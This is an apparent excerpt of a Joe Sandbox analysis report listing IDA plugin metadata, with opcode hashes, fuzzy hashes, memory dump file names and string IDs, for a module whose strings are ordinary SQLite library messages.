                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                          • API String ID: 0-463513059
                                                                                                                                                                                                          • Opcode ID: e69649e3b2d1fb556b712b41518bbec7297b5ac68d350c4718e9be10159b396a
                                                                                                                                                                                                          • Instruction ID: c5ed1ce5aaf9756310d51ae7d02cfee5bd0eee2e629e2b006820f8c29160b1d2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69649e3b2d1fb556b712b41518bbec7297b5ac68d350c4718e9be10159b396a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F1F551B2E7870BEF0C9B3965219782B92AB85780F589136DA7E437F6DE3CB911C300
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                          • API String ID: 0-3582982771
                                                                                                                                                                                                          • Opcode ID: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                                          • Instruction ID: 45f04599f8243cf8f2bcf80fd30a03ffa771c05048c6d0e21f080faae6856756
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26628B62B0AB8786EB549B15E864B7A37A4FF84B84F244535CA6E473FCDF78E4418340
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                          • API String ID: 0-3582982771
                                                                                                                                                                                                          • Opcode ID: 1b3996caacf4a2312daa13beee652dc50d737970d299b47f4be9e6e8c5a389a4
                                                                                                                                                                                                          • Instruction ID: 9effab64528143a20f5ab6b16403f8a6eb29c2034a341c3e81c9cf77dcfad67e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b3996caacf4a2312daa13beee652dc50d737970d299b47f4be9e6e8c5a389a4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46526B61B0A74385EB649F35A464BB93790EF89B84F284131CA6E47AFDDF7CE4418340
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s.%s$%s.rowid$5
                                                                                                                                                                                                          • API String ID: 0-2959728198
                                                                                                                                                                                                          • Opcode ID: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                                          • Instruction ID: 872ef350846355b19adf4bddbe55787e9025e560ea70281aaa177b49795bdd81
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82337073B2A6828AE760CF15D060BAA77A1FBC4BC4F194135DA9E477A9DF39D441CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RECURSIVE STEP$SETUP$cannot use window functions in recursive queries$recursive aggregate queries not supported
                                                                                                                                                                                                          • API String ID: 0-4261064685
                                                                                                                                                                                                          • Opcode ID: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                          • Instruction ID: 7c7c4c55fdda951685206baa78c796e3da6c4145aa47fba9aecd2b160173974c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12328F72A09B828AD760DF25D450BAD7BA4F784F88F558135CA9E4BBB9DF39D001CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                          • API String ID: 0-2031831958
                                                                                                                                                                                                          • Opcode ID: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                          • Instruction ID: b8e594d33ec7cc309511ca42adafde2d8e454975e90b23f3b3e32b914512957a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1021122B0E783C6EB25CB259464A797BA1FB85B85F094035DA6E477F9DE3CE600C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                          • API String ID: 0-4001610065
                                                                                                                                                                                                          • Opcode ID: 587790c04705c336b0da028d4f799647ffc3893eac96114cd5bcf19acb8bef33
                                                                                                                                                                                                          • Instruction ID: e8a19e4197960296165a07ada12c219e5f1b785788e24df0667b7d55a5486b90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 587790c04705c336b0da028d4f799647ffc3893eac96114cd5bcf19acb8bef33
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E28F72B197828AE750CF25D450AAD77A1FB84B88F114136EA5E53BBCDF38E446CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                                          • API String ID: 0-4099593418
                                                                                                                                                                                                          • Opcode ID: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                          • Instruction ID: 2a12552670671c0f4743bb14cc6525ede30f9bae2a86b89bcddeae448d9db38d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BB28A72619B82CADB60DF15E450AAD7BA0F7C8B94F118235DB9E43BA8DF39D544CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: malformed JSON$null$string or blob too big
                                                                                                                                                                                                          • API String ID: 0-759322337
                                                                                                                                                                                                          • Opcode ID: 5569c515b0de28c6886f2633f4a32bdbd455d526f1b924a5b235b4abbe687c3f
                                                                                                                                                                                                          • Instruction ID: 38df67f6fee05c1d966c7d13e0a0252f91eb9f5df1b41d292147050a927cffe3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5569c515b0de28c6886f2633f4a32bdbd455d526f1b924a5b235b4abbe687c3f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63727F22B0AB4389FB108B65D0607BD7762AB44758F284236CA6D1B7FDDE3EE485C740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: USING INDEX %s FOR IN-OPERATOR$USING ROWID SEARCH ON TABLE %s FOR IN-OPERATOR$f
                                                                                                                                                                                                          • API String ID: 0-872296338
                                                                                                                                                                                                          • Opcode ID: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                          • Instruction ID: ba906050edf2552129a4322829bd6456edc27a8aa2823a6dae592aba06f16e2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F52CE72B1A7C685EB608F15D060BB97BA1FB85B84F458131DAAE437F9DF38E4408784
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                          • API String ID: 0-4001610065
                                                                                                                                                                                                          • Opcode ID: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                          • Instruction ID: f5c0592ecfdb0d35d85461c499a5b930bd7817d1c2a609d4b8d97b6fb25cd891
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46428C32B0AB83C6EB50CF25D464B6937A4FB88B85F114032DA6E87BB8DF39D5458740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 5$7$row value misused
                                                                                                                                                                                                          • API String ID: 0-355943616
                                                                                                                                                                                                          • Opcode ID: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                          • Instruction ID: 6131fcac603f3bbeaa0538f3ae655723b42c7efd4736d89d4386c93fbb5da2af
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5722BF72A097868AD760CF15D450BAD7BA5F788B84F558136DB9E47BB8CF38E442CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                          • API String ID: 0-4001610065
                                                                                                                                                                                                          • Opcode ID: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                          • Instruction ID: b4ddb946ab9a3038a1604d6a1ad07dc9c321733c52616c5c97ab60c9df15c973
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F02AD32B0A78787E7648B16E464AA977A1FB88B84F054036DA6D477F8DF3DE448C740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$pB
                                                                                                                                                                                                          • API String ID: 0-1520028347
                                                                                                                                                                                                          • Opcode ID: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                                          • Instruction ID: b45c772a2d890b9fa47f13650b38632ddc783fdad8df959a9643cfd0bfdeb5b0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F24C22B1AB4386EB989F15E860A7973A4FF85B84F054435DA6E47BF8DF3DE4418700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                          • API String ID: 0-4001610065
                                                                                                                                                                                                          • Opcode ID: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                          • Instruction ID: 431c320302fd084bdbd38f5a1739c43d1e39084a3e7a8332a82b4ec7b9b60b65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1291CD72B0A78787D714AF26D9A096973A2FB84B84F044039CB6D47BB9DF38E452C300
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
